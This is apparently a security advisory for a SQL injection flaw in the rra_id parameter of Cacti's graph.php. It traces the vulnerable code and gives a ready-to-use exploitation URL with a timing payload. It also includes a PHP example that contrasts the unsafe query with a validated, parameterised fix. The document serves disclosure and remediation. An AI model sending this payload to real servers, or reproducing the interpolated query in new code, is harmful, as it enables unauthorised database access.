Cacti SQL Injection Vulnerability (CNVD-2015-08486)

Seebug SSV:90193
2015-12-30 00:00:00
Root
www.seebug.org

EPSS: 0.014 (Low), percentile 84.9%

0x01 Vulnerability summary

Cacti is an open-source network traffic monitoring and analysis tool from the Cacti Group. It collects data with snmpget, draws graphs with RRDtool for analysis, and provides data and user management functions.

Cacti versions before 0.8.8f contain a SQL injection vulnerability that allows a remote attacker to execute arbitrary SQL commands via the rra_id parameter of the properties action in graph.php.

0x02 Vulnerability details

The vulnerability is in the file /cacti-0.8.8f/graph.php

line 25

```php
include_once("./include/top_graph_header.php");
/* set default action */
if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = "view"; }
if (!isset($_REQUEST["view_type"])) { $_REQUEST["view_type"] = ""; }

$guest_account = true; /* variable name as in upstream Cacti graph.php; the extracted page had lost it */
include("./include/auth.php");
include_once("./lib/rrd.php");

api_plugin_hook_function('graph');

include_once("./lib/html_tree.php");
include_once("./include/top_graph_header.php");

/* ================= input validation ================= */
input_validate_input_regex(get_request_var("rra_id"), "^([0-9]+|all)$");
input_validate_input_number(get_request_var("local_graph_id"));
input_validate_input_number(get_request_var("graph_end"));
input_validate_input_number(get_request_var("graph_start"));
input_validate_input_regex(get_request_var_request("view_type"), "^([a-zA-Z0-9]+)$");
/* ==================================================== */
```

/cacti-0.8.8f/include/top_graph_header.php

line 30: the rra_id parameter is not validated here (only local_graph_id, graph_start and graph_end are), and this header runs before the validation block in graph.php

```php
/* ================= input validation ================= */
input_validate_input_number(get_request_var_request("local_graph_id"));
input_validate_input_number(get_request_var_request("graph_start"));
input_validate_input_number(get_request_var_request("graph_end"));
/* ==================================================== */
```

Continuing to trace:

line 158
```php
<?php if ((basename($_SERVER["PHP_SELF"]) == "graph.php") && ($_REQUEST["action"] == "properties")) {?>
<tr>
    <td valign="top" colspan="3">
        <?php
        $graph_data_array["print_source"] = true;

        /* override: graph start time (unix time) */
        if (!empty($_GET["graph_start"])) {
            $graph_data_array["graph_start"] = get_request_var_request("graph_start");
        }

        /* override: graph end time (unix time) */
        if (!empty($_GET["graph_end"])) {
            $graph_data_array["graph_end"] = get_request_var_request("graph_end");
        }

        /* rra_id is passed straight through to rrdtool_function_graph() without validation */
        print trim(@rrdtool_function_graph(get_request_var_request("local_graph_id"), get_request_var_request("rra_id"), $graph_data_array));
        ?>
```

\cacti-0.8.8f\lib\rrd.php, function rrdtool_function_graph, line 631

```php
            $rra["timespan"] = 86400;
        }else{
            /* get a list of RRAs related to this graph */
            $rras = get_associated_rras($local_graph_id);

            if (sizeof($rras) > 0) {
                foreach ($rras as $unchosen_rra) {
                    /* the timespan specified in the RRA "timespan" field may not be accurate */
                    $real_timespan = ($ds_step * $unchosen_rra["steps"] * $unchosen_rra["rows"]);

                    /* make sure the current start/end times fit within each RRA's timespan */
                    if ( (($graph_data_array["graph_end"] - $graph_data_array["graph_start"]) <= $real_timespan) && ((time() - $graph_data_array["graph_start"]) <= $real_timespan) ) {
                        /* is this RRA better than the already chosen one? */
                        if ((isset($rra)) && ($unchosen_rra["steps"] < $rra["steps"])) {
                            $rra = $unchosen_rra;
                        }else if (!isset($rra)) {
                            $rra = $unchosen_rra;
                        }
                    }
                }
            }

            if (!isset($rra)) {
                $rra["rows"] = 600;
                $rra["steps"] = 1;
            }
        }
    }else{
        // sql injection here: $rra_id is interpolated unescaped into the query
        $rra = db_fetch_row("select timespan,rows,steps from rra where id=$rra_id");
    }
```

Exploitation:

http://192.168.x.x/cacti/graph.php?action=properties&local_graph_id=1&rra_id=1%20and%20benchmark(20000000%2csha1(1))--%20&view_type=&graph_start=1448274676&graph_end=1448360776
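To show why the request above reaches the SQL parser and how the same sink is closed, here is an added example that is not Cacti's code: the page's unsafe pattern (`$rra_id` interpolated into the query string) next to a hardened equivalent that applies the same `^([0-9]+|all)$` allow-list graph.php already uses and then binds the value as an integer. It uses PDO with an in-memory SQLite table constructed in the script instead of Cacti's MySQL database; the table and column names mirror the page's query, and the function names `fetch_rra_unsafe`, `fetch_rra_safe` and `validate_rra_id` are this example's own.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for Cacti's rra table (same columns as the page's query).
function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // "rows" is quoted because it is a reserved word in newer SQLite releases.
    $db->exec('CREATE TABLE rra (id INTEGER PRIMARY KEY, timespan INTEGER, "rows" INTEGER, steps INTEGER)');
    $db->exec('INSERT INTO rra VALUES (1, 86400, 600, 1), (2, 604800, 700, 6)');
    return $db;
}

// Unsafe: mirrors the sink in rrdtool_function_graph(). Whatever the client
// sends as rra_id becomes part of the SQL text.
function fetch_rra_unsafe(PDO $db, string $rra_id): ?array {
    $row = $db->query("SELECT timespan, \"rows\", steps FROM rra WHERE id=$rra_id")
              ->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Allow-list check equivalent to input_validate_input_regex(..., "^([0-9]+|all)$").
// Returns an int, the string 'all', or null when the value must be rejected.
function validate_rra_id(string $rra_id) {
    if (!preg_match('/^([0-9]+|all)$/', $rra_id)) {
        return null;
    }
    return $rra_id === 'all' ? 'all' : (int)$rra_id;
}

// Hardened: validate first, then pass the id as a bound integer parameter so it
// can only ever be a value, never SQL syntax.
function fetch_rra_safe(PDO $db, string $rra_id): ?array {
    $id = validate_rra_id($rra_id);
    if ($id === null || $id === 'all') {
        // 'all' takes the non-SQL branch in Cacti; nothing to look up here.
        return null;
    }
    $stmt = $db->prepare('SELECT timespan, "rows", steps FROM rra WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = make_db();
// The rra_id value from the page's request, URL-decoded.
$payload = rawurldecode('1%20and%20benchmark(20000000%2csha1(1))--%20');

foreach (['1', $payload] as $input) {
    try {
        $r = fetch_rra_unsafe($db, $input);
        printf("unsafe %-42s -> %s\n", json_encode($input), json_encode($r));
    } catch (PDOException $e) {
        // SQLite has no benchmark(); the error proves the payload was parsed as SQL.
        printf("unsafe %-42s -> SQL error: %s\n", json_encode($input), $e->getMessage());
    }
    $r = fetch_rra_safe($db, $input);
    printf("safe   %-42s -> %s\n", json_encode($input), $r === null ? 'rejected before SQL' : json_encode($r));
}
```

Run with `php example.php`: for `1` both functions return the row with timespan 86400; for the injected value the unsafe function hands the text to the database (SQLite reports an unknown function, MySQL would execute the benchmark() delay), while the hardened function rejects it at the allow-list and never builds a query. A web-layer check that logs or blocks rra_id values failing the same regex is a cheap detection signal for this request pattern.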

0x03 References

FULLDISC: 20151209 [CVE-2015-8369] Cacti SQL injection in graph.php
URL: http://seclists.org/fulldisclosure/2015/Dec/8

MISC: http://bugs.cacti.net/view.php?id=2646